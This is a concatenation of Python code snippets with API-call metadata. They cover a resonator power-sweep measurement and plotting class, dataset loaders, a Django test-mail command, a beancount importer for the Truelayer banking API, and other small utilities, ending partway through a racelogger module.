out_ports=self.output_port,
)
lck.hardware.sleep(1e-3, False)
_d = lck.get_pixels(self.num_skip + self.num_averages, quiet=True)
data_i = _d[self.input_port][1][:, 0]
data_q = _d[self.input_port][2][:, 0]
data = data_i.real + 1j * data_q.real # using zero IF
self.resp_arr[jj, ii] = np.mean(data[-self.num_averages:])
pb.increment()
pb.done()
# Mute outputs at the end of the sweep
og.set_amplitudes(0.0)
lck.apply_settings()
return self.save()
def save(self, save_filename: str = None) -> str:
return super().save(__file__, save_filename=save_filename)
@classmethod
def load(cls, load_filename: str) -> 'SweepPower':
with h5py.File(load_filename, "r") as h5f:
freq_center = h5f.attrs["freq_center"]
freq_span = h5f.attrs["freq_span"]
df = h5f.attrs["df"]
num_averages = h5f.attrs["num_averages"]
output_port = h5f.attrs["output_port"]
input_port = h5f.attrs["input_port"]
dither = h5f.attrs["dither"]
num_skip = h5f.attrs["num_skip"]
amp_arr = h5f["amp_arr"][()]
freq_arr = h5f["freq_arr"][()]
resp_arr = h5f["resp_arr"][()]
self = cls(
freq_center=freq_center,
freq_span=freq_span,
df=df,
num_averages=num_averages,
amp_arr=amp_arr,
output_port=output_port,
input_port=input_port,
dither=dither,
num_skip=num_skip,
)
self.freq_arr = freq_arr
self.resp_arr = resp_arr
return self
def analyze(self, norm: bool = True, portrait: bool = True, blit: bool = False):
if self.freq_arr is None:
raise RuntimeError
if self.resp_arr is None:
raise RuntimeError
import matplotlib.pyplot as plt
try:
from resonator_tools import circuit
import matplotlib.widgets as mwidgets
_do_fit = True
except ImportError:
_do_fit = False
nr_amps = len(self.amp_arr)
self._AMP_IDX = nr_amps // 2
if norm:
resp_scaled = np.zeros_like(self.resp_arr)
for jj in range(nr_amps):
resp_scaled[jj] = self.resp_arr[jj] / self.amp_arr[jj]
else:
resp_scaled = self.resp_arr
resp_dB = 20. * np.log10(np.abs(resp_scaled))
amp_dBFS = 20 * np.log10(self.amp_arr / 1.0)
# choose limits for colorbar
cutoff = 1. # %
lowlim = np.percentile(resp_dB, cutoff)
highlim = np.percentile(resp_dB, 100. - cutoff)
# extent
x_min = 1e-9 * self.freq_arr[0]
x_max = 1e-9 * self.freq_arr[-1]
dx = 1e-9 * (self.freq_arr[1] - self.freq_arr[0])
y_min = amp_dBFS[0]
y_max = amp_dBFS[-1]
dy = amp_dBFS[1] - amp_dBFS[0]
if portrait:
fig1 = plt.figure(tight_layout=True, figsize=(6.4, 9.6))
ax1 = fig1.add_subplot(2, 1, 1)
# fig1 = plt.figure(tight_layout=True)
# ax1 = fig1.add_subplot(1, 1, 1)
else:
fig1 = plt.figure(tight_layout=True, figsize=(12.8, 4.8))
ax1 = fig1.add_subplot(1, 2, 1)
im = ax1.imshow(
resp_dB,
origin='lower',
aspect='auto',
interpolation='none',
extent=(x_min - dx / 2, x_max + dx / 2, y_min - dy / 2, y_max + dy / 2),
vmin=lowlim,
vmax=highlim,
)
line_sel = ax1.axhline(amp_dBFS[self._AMP_IDX], ls="--", c="k", lw=3, animated=blit)
# ax1.set_title(f"amp = {amp_arr[AMP_IDX]:.2e}")
ax1.set_xlabel("Frequency [GHz]")
ax1.set_ylabel("Drive amplitude [dBFS]")
cb = fig1.colorbar(im)
if portrait:
cb.set_label("Response amplitude [dB]")
else:
ax1.set_title("Response amplitude [dB]")
fig1.show()
# return fig1
if portrait:
ax2 = fig1.add_subplot(4, 1, 3)
ax3 = fig1.add_subplot(4, 1, 4, sharex=ax2)
else:
ax2 = fig1.add_subplot(2, 2, 2)
ax3 = fig1.add_subplot(2, 2, 4, sharex=ax2)
ax2.yaxis.set_label_position("right")
ax2.yaxis.tick_right()
ax3.yaxis.set_label_position("right")
ax3.yaxis.tick_right()
line_a, = ax2.plot(1e-9 * self.freq_arr, resp_dB[self._AMP_IDX], label="measured", animated=blit)
line_p, = ax3.plot(1e-9 * self.freq_arr, np.angle(self.resp_arr[self._AMP_IDX]), animated=blit)
if _do_fit:
line_fit_a, = ax2.plot(1e-9 * self.freq_arr,
np.full_like(self.freq_arr, np.nan),
ls="--",
label="fit",
animated=blit)
line_fit_p, = ax3.plot(1e-9 * self.freq_arr, np.full_like(self.freq_arr, np.nan), ls="--", animated=blit)
f_min = 1e-9 * self.freq_arr.min()
f_max = 1e-9 * self.freq_arr.max()
f_rng = f_max - f_min
a_min = resp_dB.min()
a_max = resp_dB.max()
a_rng = a_max - a_min
p_min = -np.pi
p_max = np.pi
p_rng = p_max - p_min
ax2.set_xlim(f_min - 0.05 * f_rng, f_max + 0.05 * f_rng)
ax2.set_ylim(a_min - 0.05 * a_rng, a_max + 0.05 * a_rng)
ax3.set_xlim(f_min - 0.05 * f_rng, f_max + 0.05 * f_rng)
ax3.set_ylim(p_min - 0.05 * p_rng, p_max + 0.05 * p_rng)
ax3.set_xlabel("Frequency [GHz]")
ax2.set_ylabel("Response amplitude [dB]")
ax3.set_ylabel("Response phase [rad]")
ax2.legend(loc="lower right")
def onbuttonpress(event):
if event.inaxes == ax1:
self._AMP_IDX = np.argmin(np.abs(amp_dBFS - event.ydata))
update()
def onkeypress(event):
if event.inaxes == ax1:
if event.key == "up":
self._AMP_IDX += 1
if self._AMP_IDX >= len(amp_dBFS):
self._AMP_IDX = len(amp_dBFS) - 1
update()
elif event.key == "down":
self._AMP_IDX -= 1
if self._AMP_IDX < 0:
self._AMP_IDX = 0
update()
def update():
line_sel.set_ydata([amp_dBFS[self._AMP_IDX], amp_dBFS[self._AMP_IDX]])
# ax1.set_title(f"amp = {amp_arr[AMP_IDX]:.2e}")
print(
f"drive amp {self._AMP_IDX:d}: {self.amp_arr[self._AMP_IDX]:.2e} FS = {amp_dBFS[self._AMP_IDX]:.1f} dBFS"
)
line_a.set_ydata(resp_dB[self._AMP_IDX])
line_p.set_ydata(np.angle(self.resp_arr[self._AMP_IDX]))
if _do_fit:
line_fit_a.set_ydata(np.full_like(self.freq_arr, np.nan))
line_fit_p.set_ydata(np.full_like(self.freq_arr, np.nan))
# ax2.set_title("")
if blit:
fig1.canvas.restore_region(self._bg)
ax1.draw_artist(line_sel)
ax2.draw_artist(line_a)
ax3.draw_artist(line_p)
fig1.canvas.blit(fig1.bbox)
fig1.canvas.flush_events()
else:
fig1.canvas.draw()
if _do_fit:
def onselect(xmin, xmax):
port = circuit.notch_port(self.freq_arr, self.resp_arr[self._AMP_IDX])
port.autofit(fcrop=(xmin * 1e9, xmax * 1e9))
if norm:
line_fit_a.set_data(1e-9 * port.f_data,
20 * np.log10(np.abs(port.z_data_sim / self.amp_arr[self._AMP_IDX])))
else:
line_fit_a.set_data(1e-9 * port.f_data, 20 * np.log10(np.abs(port.z_data_sim)))
line_fit_p.set_data(1e-9 * port.f_data, np.angle(port.z_data_sim))
# print(port.fitresults)
print("----------------")
print(f"fr = {port.fitresults['fr']}")
print(f"Qi = {port.fitresults['Qi_dia_corr']}")
print(f"Qc = {port.fitresults['Qc_dia_corr']}")
print(f"Ql = {port.fitresults['Ql']}")
print(f"kappa = {port.fitresults['fr'] / port.fitresults['Qc_dia_corr']}")
print("----------------")
# ax2.set_title(
# f"fr = {1e-6*fr:.0f} MHz, Ql = {Ql:.0f}, Qi = {Qi:.0f}, Qc = {Qc:.0f}, kappa = {1e-3*kappa:.0f} kHz")
if blit:
fig1.canvas.restore_region(self._bg)
ax1.draw_artist(line_sel)
ax2.draw_artist(line_a)
ax2.draw_artist(line_fit_a)
ax3.draw_artist(line_p)
ax3.draw_artist(line_fit_p)
fig1.canvas.blit(fig1.bbox)
fig1.canvas.flush_events()
else:
fig1.canvas.draw()
rectprops = dict(facecolor='tab:gray', alpha=0.5)
fig1._span_a = mwidgets.SpanSelector(ax2, onselect, 'horizontal', rectprops=rectprops, useblit=blit)
fig1._span_p = mwidgets.SpanSelector(ax3, onselect, 'horizontal', rectprops=rectprops, useblit=blit)
fig1.canvas.mpl_connect('button_press_event', onbuttonpress)
fig1.canvas.mpl_connect('key_press_event', onkeypress)
fig1.show()
if blit:
fig1.canvas.draw()
fig1.canvas.flush_events()
self._bg = fig1.canvas.copy_from_bbox(fig1.bbox)
ax1.draw_artist(line_sel)
ax2.draw_artist(line_a)
ax3.draw_artist(line_p)
fig1.canvas.blit(fig1.bbox)
return fig1
|
[
"h5py.File",
"numpy.zeros_like",
"numpy.atleast_1d",
"presto.utils.ProgressBar",
"numpy.abs",
"numpy.full_like",
"numpy.angle",
"numpy.zeros",
"presto.lockin.Lockin",
"numpy.percentile",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.arange",
"matplotlib.widgets.SpanSelector",
"numpy.log10",
"resonator_tools.circuit.notch_port"
] |
[((6151, 6181), 'numpy.percentile', 'np.percentile', (['resp_dB', 'cutoff'], {}), '(resp_dB, cutoff)\n', (6164, 6181), True, 'import numpy as np\n'), ((6200, 6238), 'numpy.percentile', 'np.percentile', (['resp_dB', '(100.0 - cutoff)'], {}), '(resp_dB, 100.0 - cutoff)\n', (6213, 6238), True, 'import numpy as np\n'), ((1413, 1525), 'presto.lockin.Lockin', 'lockin.Lockin', ([], {'address': 'presto_address', 'port': 'presto_port', 'ext_ref_clk': 'ext_ref_clk'}), '(address=presto_address, port=presto_port, ext_ref_clk=\n ext_ref_clk, **CONVERTER_CONFIGURATION)\n', (1426, 1525), False, 'from presto import lockin\n'), ((2209, 2239), 'numpy.arange', 'np.arange', (['n_start', '(n_stop + 1)'], {}), '(n_start, n_stop + 1)\n', (2218, 2239), True, 'import numpy as np\n'), ((2345, 2388), 'numpy.zeros', 'np.zeros', (['(nr_amps, nr_freq)', 'np.complex128'], {}), '((nr_amps, nr_freq), np.complex128)\n', (2353, 2388), True, 'import numpy as np\n'), ((2985, 3015), 'presto.utils.ProgressBar', 'ProgressBar', (['(nr_amps * nr_freq)'], {}), '(nr_amps * nr_freq)\n', (2996, 3015), False, 'from presto.utils import ProgressBar\n'), ((4261, 4290), 'h5py.File', 'h5py.File', (['load_filename', '"""r"""'], {}), "(load_filename, 'r')\n", (4270, 4290), False, 'import h5py\n'), ((5771, 5799), 'numpy.zeros_like', 'np.zeros_like', (['self.resp_arr'], {}), '(self.resp_arr)\n', (5784, 5799), True, 'import numpy as np\n'), ((6042, 6070), 'numpy.log10', 'np.log10', (['(self.amp_arr / 1.0)'], {}), '(self.amp_arr / 1.0)\n', (6050, 6070), True, 'import numpy as np\n'), ((6532, 6581), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'tight_layout': '(True)', 'figsize': '(6.4, 9.6)'}), '(tight_layout=True, figsize=(6.4, 9.6))\n', (6542, 6581), True, 'import matplotlib.pyplot as plt\n'), ((6756, 6806), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'tight_layout': '(True)', 'figsize': '(12.8, 4.8)'}), '(tight_layout=True, figsize=(12.8, 4.8))\n', (6766, 6806), True, 'import matplotlib.pyplot as plt\n'), ((8148, 8186), 'numpy.angle', 'np.angle', (['self.resp_arr[self._AMP_IDX]'], {}), '(self.resp_arr[self._AMP_IDX])\n', (8156, 8186), True, 'import numpy as np\n'), ((12745, 12834), 'matplotlib.widgets.SpanSelector', 'mwidgets.SpanSelector', (['ax2', 'onselect', '"""horizontal"""'], {'rectprops': 'rectprops', 'useblit': 'blit'}), "(ax2, onselect, 'horizontal', rectprops=rectprops,\n useblit=blit)\n", (12766, 12834), True, 'import matplotlib.widgets as mwidgets\n'), ((12858, 12947), 'matplotlib.widgets.SpanSelector', 'mwidgets.SpanSelector', (['ax3', 'onselect', '"""horizontal"""'], {'rectprops': 'rectprops', 'useblit': 'blit'}), "(ax3, onselect, 'horizontal', rectprops=rectprops,\n useblit=blit)\n", (12879, 12947), True, 'import matplotlib.widgets as mwidgets\n'), ((984, 1006), 'numpy.atleast_1d', 'np.atleast_1d', (['amp_arr'], {}), '(amp_arr)\n', (997, 1006), True, 'import numpy as np\n'), ((5997, 6016), 'numpy.abs', 'np.abs', (['resp_scaled'], {}), '(resp_scaled)\n', (6003, 6016), True, 'import numpy as np\n'), ((8315, 8350), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (8327, 8350), True, 'import numpy as np\n'), ((8551, 8586), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (8563, 8586), True, 'import numpy as np\n'), ((10388, 10426), 'numpy.angle', 'np.angle', (['self.resp_arr[self._AMP_IDX]'], {}), '(self.resp_arr[self._AMP_IDX])\n', (10396, 10426), True, 'import numpy as np\n'), ((11051, 11114), 'resonator_tools.circuit.notch_port', 'circuit.notch_port', (['self.freq_arr', 'self.resp_arr[self._AMP_IDX]'], {}), '(self.freq_arr, self.resp_arr[self._AMP_IDX])\n', (11069, 11114), False, 'from resonator_tools import circuit\n'), ((3811, 3845), 'numpy.mean', 'np.mean', (['data[-self.num_averages:]'], {}), '(data[-self.num_averages:])\n', (3818, 3845), True, 'import numpy as np\n'), ((9446, 9476), 'numpy.abs', 'np.abs', (['(amp_dBFS - event.ydata)'], {}), '(amp_dBFS - event.ydata)\n', (9452, 9476), True, 'import numpy as np\n'), ((10489, 10524), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (10501, 10524), True, 'import numpy as np\n'), ((10563, 10598), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (10575, 10598), True, 'import numpy as np\n'), ((11549, 11574), 'numpy.angle', 'np.angle', (['port.z_data_sim'], {}), '(port.z_data_sim)\n', (11557, 11574), True, 'import numpy as np\n'), ((11315, 11368), 'numpy.abs', 'np.abs', (['(port.z_data_sim / self.amp_arr[self._AMP_IDX])'], {}), '(port.z_data_sim / self.amp_arr[self._AMP_IDX])\n', (11321, 11368), True, 'import numpy as np\n'), ((11467, 11490), 'numpy.abs', 'np.abs', (['port.z_data_sim'], {}), '(port.z_data_sim)\n', (11473, 11490), True, 'import numpy as np\n')]
|
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides access to the Smart Buidlings dataset for Anomaly Detection."""
from madi.datasets.base_dataset import BaseDataset
import numpy as np
import pandas as pd
import tensorflow as tf
_DATA_FILE = "madi/datasets/data/anomaly_detection_sample_1577622599.csv"
_README_FILE = "madi/datasets/data/anomaly_detection_sample_1577622599_README.md"
class SmartBuildingsDataset(BaseDataset):
"""Smart Buildings data set for Multivariate Anomaly Detection."""
def __init__(self,
datafilepath: str = _DATA_FILE,
readmefilepath: str = _README_FILE):
self._sample = self._load_data_file(datafilepath)
self._description = self._load_readme(readmefilepath)
@property
def sample(self) -> pd.DataFrame:
return self._sample
@property
def name(self) -> str:
return "smart_buildings"
@property
def description(self) -> str:
return self._description
def _load_data_file(self, datafile: str) -> pd.DataFrame:
sample = None
if not tf.io.gfile.exists(datafile):
raise AssertionError("{} does not exist".format(datafile))
with tf.io.gfile.GFile(datafile) as csv_file:
sample = pd.read_csv(csv_file, header="infer", index_col=0)
sample = sample.reindex(np.random.permutation(sample.index))
return sample
|
[
"pandas.read_csv",
"numpy.random.permutation",
"tensorflow.io.gfile.exists",
"tensorflow.io.gfile.GFile"
] |
[((1632, 1660), 'tensorflow.io.gfile.exists', 'tf.io.gfile.exists', (['datafile'], {}), '(datafile)\n', (1650, 1660), True, 'import tensorflow as tf\n'), ((1736, 1763), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['datafile'], {}), '(datafile)\n', (1753, 1763), True, 'import tensorflow as tf\n'), ((1792, 1842), 'pandas.read_csv', 'pd.read_csv', (['csv_file'], {'header': '"""infer"""', 'index_col': '(0)'}), "(csv_file, header='infer', index_col=0)\n", (1803, 1842), True, 'import pandas as pd\n'), ((1872, 1907), 'numpy.random.permutation', 'np.random.permutation', (['sample.index'], {}), '(sample.index)\n', (1893, 1907), True, 'import numpy as np\n')]
|
from datetime import date, datetime
dados = dict()
dados['nome'] = str(input('Nome: '))
nasc = int(input('ANO DE NASCIMENTO: '))
dados['idade'] = datetime.now().year - nasc
dados['ctps'] = int(input('carteira de trabalho (0 não tem): '))
if dados['ctps'] != 0:
dados['contratação'] = int(input('ano de contratação: '))
dados['salário'] = float(input('salário: R$'))
dados['aposentadoria'] = (dados['contratação'] + 35) - datetime.now().year
for v,r in dados.items():
print(f'- {v} é igual a {r}')
|
[
"datetime.datetime.now"
] |
[((146, 160), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (158, 160), False, 'from datetime import date, datetime\n'), ((435, 449), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (447, 449), False, 'from datetime import date, datetime\n')]
|
import torch
from torch.utils.data import Dataset
import numpy as np
from scipy.io import loadmat
class NatPatchDataset(Dataset):
def __init__(self, N:int, width:int, height:int, border:int=4, fpath:str='../../data/IMAGES.mat', test=False):
super(NatPatchDataset, self).__init__()
self.N = N
self.width = width
self.height = height
self.border = border
self.fpath = fpath
self.test = test
# holder
self.images = None
# initialize patches
self.extract_patches_()
def __len__(self):
return self.images.shape[0]
def __getitem__(self, idx):
return self.images[idx]
def extract_patches_(self):
# load mat
X = loadmat(self.fpath)
X = X['IMAGES']
img_size = X.shape[0]
n_img = X.shape[2]
self.images = torch.zeros((self.N * n_img, self.width, self.height))
# for every image
counter = 0
# Save the last image for testing
if self.test:
image_indices = [-1]
else:
image_indices = range(n_img)[:-1]
for i in image_indices:
img = X[:, :, i]
for j in range(self.N):
if self.test: # use a deterministic patch for producing figures
x = 63
y = 14
else:
x = np.random.randint(self.border, img_size - self.width - self.border)
y = np.random.randint(self.border, img_size - self.height - self.border)
crop = torch.tensor(img[x:x+self.width, y:y+self.height])
self.images[counter, :, :] = crop - crop.mean()
counter += 1
|
[
"torch.zeros",
"numpy.random.randint",
"torch.tensor",
"scipy.io.loadmat"
] |
[((746, 765), 'scipy.io.loadmat', 'loadmat', (['self.fpath'], {}), '(self.fpath)\n', (753, 765), False, 'from scipy.io import loadmat\n'), ((869, 923), 'torch.zeros', 'torch.zeros', (['(self.N * n_img, self.width, self.height)'], {}), '((self.N * n_img, self.width, self.height))\n', (880, 923), False, 'import torch\n'), ((1589, 1643), 'torch.tensor', 'torch.tensor', (['img[x:x + self.width, y:y + self.height]'], {}), '(img[x:x + self.width, y:y + self.height])\n', (1601, 1643), False, 'import torch\n'), ((1405, 1472), 'numpy.random.randint', 'np.random.randint', (['self.border', '(img_size - self.width - self.border)'], {}), '(self.border, img_size - self.width - self.border)\n', (1422, 1472), True, 'import numpy as np\n'), ((1497, 1565), 'numpy.random.randint', 'np.random.randint', (['self.border', '(img_size - self.height - self.border)'], {}), '(self.border, img_size - self.height - self.border)\n', (1514, 1565), True, 'import numpy as np\n')]
|
import ihm.model
import logging
dockinglog = logging.getLogger("log")
class DockingModel(ihm.model.Model):
"""Subclass to save memory."""
# ======================================================================
# IMPORTANT #
# To add the atoms, the class module needs a list containing the following:
# [(<ihm.AsymUnit object...108edf5b0>, 1, 'C', 'CA', 1.0, 2.0, 3.0), ...]
# Which means that the AsymUnit object will be copied many times and this
# will eat a lot of memory.
# To avoid this we subclass IHM Model class and override get_atoms function
# ======================================================================
def __init__(self, assymetric_dic, atom_list, *args, **kwargs):
super().__init__(*args, **kwargs)
self.asym_unit_map = assymetric_dic
self.atom_list = atom_list
def get_atoms(self):
for asym, seq_id, type_symbol, atom_id, x, y, z in self.atom_list:
yield ihm.model.Atom(
asym_unit=self.asym_unit_map[asym],
type_symbol=type_symbol,
seq_id=seq_id,
atom_id=atom_id,
x=x,
y=y,
z=z,
)
|
[
"logging.getLogger"
] |
[((46, 70), 'logging.getLogger', 'logging.getLogger', (['"""log"""'], {}), "('log')\n", (63, 70), False, 'import logging\n')]
|
from django.core.management.base import BaseCommand
from mainapp.functions.mail import send_mail
from mainapp.models import UserProfile
class Command(BaseCommand):
help = "Sends a test e-mail to check if the mail-system is configured correctly"
def add_arguments(self, parser):
parser.add_argument("to-email", type=str)
def handle(self, *args, **options):
body_text = "The test e-mail has arrived 🎉"
body_html = "<h1>The test e-mail has arrived 🎉</h1>"
to_email = options["to-email"]
profile = UserProfile.objects.filter(user__email=to_email).first()
send_mail(to_email, "Hello 🌏", body_text, body_html, profile)
|
[
"mainapp.models.UserProfile.objects.filter",
"mainapp.functions.mail.send_mail"
] |
[((618, 679), 'mainapp.functions.mail.send_mail', 'send_mail', (['to_email', '"""Hello 🌏"""', 'body_text', 'body_html', 'profile'], {}), "(to_email, 'Hello 🌏', body_text, body_html, profile)\n", (627, 679), False, 'from mainapp.functions.mail import send_mail\n'), ((552, 600), 'mainapp.models.UserProfile.objects.filter', 'UserProfile.objects.filter', ([], {'user__email': 'to_email'}), '(user__email=to_email)\n', (578, 600), False, 'from mainapp.models import UserProfile\n')]
|
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from packaging.version import parse
try:
import tensorflow as tf
except:
raise ImportWarning(
"It seems like the Tensorflow package is not installed\n"
"Please run"
"`$ pip install tensorflow`. \n",
)
def check_tf_version():
if parse(tf.__version__) < parse("2.0.0"):
raise ImportError(
"The Tensorflow package version needs to be at least 2.0.0 \n"
"for keras-ncp to run. Currently, your TensorFlow version is \n"
"{version}. Please upgrade with \n"
"`$ pip install --upgrade tensorflow`. \n"
"You can use `pip freeze` to check afterwards that everything is "
"ok.".format(version=tf.__version__)
)
|
[
"packaging.version.parse"
] |
[((843, 864), 'packaging.version.parse', 'parse', (['tf.__version__'], {}), '(tf.__version__)\n', (848, 864), False, 'from packaging.version import parse\n'), ((867, 881), 'packaging.version.parse', 'parse', (['"""2.0.0"""'], {}), "('2.0.0')\n", (872, 881), False, 'from packaging.version import parse\n')]
|
import string
from nltk.tokenize.casual import TweetTokenizer
def tokenize(text):
tweet_tokenizer = TweetTokenizer()
# 1. Tokenize
text = tweet_tokenizer.tokenize(text)
# 2. Cleaning
# Punctuation
text = [t for t in text if t not in string.punctuation]
# Normalisieren
text = [t.lower() for t in text]
return text
|
[
"nltk.tokenize.casual.TweetTokenizer"
] |
[((105, 121), 'nltk.tokenize.casual.TweetTokenizer', 'TweetTokenizer', ([], {}), '()\n', (119, 121), False, 'from nltk.tokenize.casual import TweetTokenizer\n')]
|
import subprocess
proc = subprocess.Popen(["cargo", "clippy"], stderr=subprocess.PIPE)
output = proc.stderr.read().decode("utf-8")
groups = [group for group in output.split("\n\n") if "parser.rs" not in group]
print("\n-----------------\n".join(groups[:20]))
|
[
"subprocess.Popen"
] |
[((26, 87), 'subprocess.Popen', 'subprocess.Popen', (["['cargo', 'clippy']"], {'stderr': 'subprocess.PIPE'}), "(['cargo', 'clippy'], stderr=subprocess.PIPE)\n", (42, 87), False, 'import subprocess\n')]
|
import logging
from datetime import timedelta
from os import path
import dateutil.parser
import requests
import yaml
from beancount.core import amount, data
from beancount.core.number import D
from beancount.ingest import importer
class Importer(importer.ImporterProtocol):
"""An importer for Truelayer API (e.g. for Revolut)."""
def __init__(self):
self.config = None
self.baseAccount = None
self.clientId = None
self.clientSecret = None
self.refreshToken = None
self.sandbox = None
self.existing_entries = None
self.domain = "truelayer.com"
def _configure(self, file, existing_entries):
with open(file.name, "r") as f:
self.config = yaml.safe_load(f)
self.baseAccount = self.config["baseAccount"]
self.clientId = self.config["client_id"]
self.clientSecret = self.config["client_secret"]
self.refreshToken = self.config["refresh_token"]
self.sandbox = self.clientId.startswith("sandbox")
self.existing_entries = existing_entries
if self.sandbox:
self.domain = "truelayer-sandbox.com"
def identify(self, file):
return "truelayer.yaml" == path.basename(file.name)
def file_account(self, file):
return ""
def extract(self, file, existing_entries=None):
self._configure(file, existing_entries)
r = requests.post(
f"https://auth.{self.domain}/connect/token",
data={
"grant_type": "refresh_token",
"client_id": self.clientId,
"client_secret": self.clientSecret,
"refresh_token": self.refreshToken,
},
)
tokens = r.json()
accessToken = tokens["access_token"]
headers = {"Authorization": "Bearer " + accessToken}
entries = []
entries.extend(self._extract_endpoint_transactions("accounts", headers))
entries.extend(
self._extract_endpoint_transactions("cards", headers, invert_sign=True)
)
return entries
def _extract_endpoint_transactions(self, endpoint, headers, invert_sign=False):
entries = []
r = requests.get(
f"https://api.{self.domain}/data/v1/{endpoint}", headers=headers
)
if not r:
try:
r.raise_for_status()
except requests.HTTPError as e:
logging.warning(e)
return []
for account in r.json()["results"]:
accountId = account["account_id"]
accountCcy = account["currency"]
r = requests.get(
f"https://api.{self.domain}/data/v1/{endpoint}/{accountId}/transactions",
headers=headers,
)
transactions = sorted(r.json()["results"], key=lambda trx: trx["timestamp"])
for trx in transactions:
entries.extend(
self._extract_transaction(
trx, accountCcy, transactions, invert_sign
)
)
return entries
def _extract_transaction(self, trx, accountCcy, transactions, invert_sign):
entries = []
metakv = {}
# sandbox Mock bank doesn't have a provider_id
if "meta" in trx and "provider_id" in trx["meta"]:
metakv["tlref"] = trx["meta"]["provider_id"]
if trx["transaction_classification"]:
metakv["category"] = trx["transaction_classification"][0]
meta = data.new_metadata("", 0, metakv)
trxDate = dateutil.parser.parse(trx["timestamp"]).date()
account = self.baseAccount + accountCcy
tx_amount = D(str(trx["amount"]))
# avoid pylint invalid-unary-operand-type
signed_amount = -1 * tx_amount if invert_sign else tx_amount
entry = data.Transaction(
meta,
trxDate,
"*",
"",
trx["description"],
data.EMPTY_SET,
data.EMPTY_SET,
[
data.Posting(
account,
amount.Amount(signed_amount, trx["currency"]),
None,
None,
None,
None,
),
],
)
entries.append(entry)
if trx["transaction_id"] == transactions[-1]["transaction_id"]:
balDate = trxDate + timedelta(days=1)
metakv = {}
if self.existing_entries is not None:
for exEntry in self.existing_entries:
if (
isinstance(exEntry, data.Balance)
and exEntry.date == balDate
and exEntry.account == account
):
metakv["__duplicate__"] = True
meta = data.new_metadata("", 0, metakv)
# Only if the 'balance' permission is present
if "running_balance" in trx:
tx_balance = D(str(trx["running_balance"]["amount"]))
# avoid pylint invalid-unary-operand-type
signed_balance = -1 * tx_balance if invert_sign else tx_balance
entries.append(
data.Balance(
meta,
balDate,
account,
amount.Amount(
signed_balance, trx["running_balance"]["currency"]
),
None,
None,
)
)
return entries
|
[
"os.path.basename",
"logging.warning",
"beancount.core.amount.Amount",
"yaml.safe_load",
"datetime.timedelta",
"requests.get",
"requests.post",
"beancount.core.data.new_metadata"
] |
[((1413, 1618), 'requests.post', 'requests.post', (['f"""https://auth.{self.domain}/connect/token"""'], {'data': "{'grant_type': 'refresh_token', 'client_id': self.clientId, 'client_secret':\n self.clientSecret, 'refresh_token': self.refreshToken}"}), "(f'https://auth.{self.domain}/connect/token', data={\n 'grant_type': 'refresh_token', 'client_id': self.clientId,\n 'client_secret': self.clientSecret, 'refresh_token': self.refreshToken})\n", (1426, 1618), False, 'import requests\n'), ((2219, 2297), 'requests.get', 'requests.get', (['f"""https://api.{self.domain}/data/v1/{endpoint}"""'], {'headers': 'headers'}), "(f'https://api.{self.domain}/data/v1/{endpoint}', headers=headers)\n", (2231, 2297), False, 'import requests\n'), ((3561, 3593), 'beancount.core.data.new_metadata', 'data.new_metadata', (['""""""', '(0)', 'metakv'], {}), "('', 0, metakv)\n", (3578, 3593), False, 'from beancount.core import amount, data\n'), ((736, 753), 'yaml.safe_load', 'yaml.safe_load', (['f'], {}), '(f)\n', (750, 753), False, 'import yaml\n'), ((1221, 1245), 'os.path.basename', 'path.basename', (['file.name'], {}), '(file.name)\n', (1234, 1245), False, 'from os import path\n'), ((2647, 2759), 'requests.get', 'requests.get', (['f"""https://api.{self.domain}/data/v1/{endpoint}/{accountId}/transactions"""'], {'headers': 'headers'}), "(\n f'https://api.{self.domain}/data/v1/{endpoint}/{accountId}/transactions',\n headers=headers)\n", (2659, 2759), False, 'import requests\n'), ((4921, 4953), 'beancount.core.data.new_metadata', 'data.new_metadata', (['""""""', '(0)', 'metakv'], {}), "('', 0, metakv)\n", (4938, 4953), False, 'from beancount.core import amount, data\n'), ((4487, 4504), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (4496, 4504), False, 'from datetime import timedelta\n'), ((2453, 2471), 'logging.warning', 'logging.warning', (['e'], {}), '(e)\n', (2468, 2471), False, 'import logging\n'), ((4157, 4202), 'beancount.core.amount.Amount', 'amount.Amount', (['signed_amount', "trx['currency']"], {}), "(signed_amount, trx['currency'])\n", (4170, 4202), False, 'from beancount.core import amount, data\n'), ((5449, 5514), 'beancount.core.amount.Amount', 'amount.Amount', (['signed_balance', "trx['running_balance']['currency']"], {}), "(signed_balance, trx['running_balance']['currency'])\n", (5462, 5514), False, 'from beancount.core import amount, data\n')]
|
import logging
import sys
from enum import Enum
from racelogger.util.utils import gate
CAR_SLOW_SPEED = 25
""" a car is considered to be slow if its speed is below this value"""
CarsManifest = ['state','carIdx','carNum','userName','teamName','car','carClass','pos','pic','lap','lc','gap','interval','trackPos','speed','dist','pitstops', 'stintLap','last','best']
"""
this is the base manifest for car data. Sector times may be added at the end.
On the other hand, items like "teamName, carClass" (and maybe others)
may be removed if they are not used in the recording session.
"""
class SectionTiming:
"""
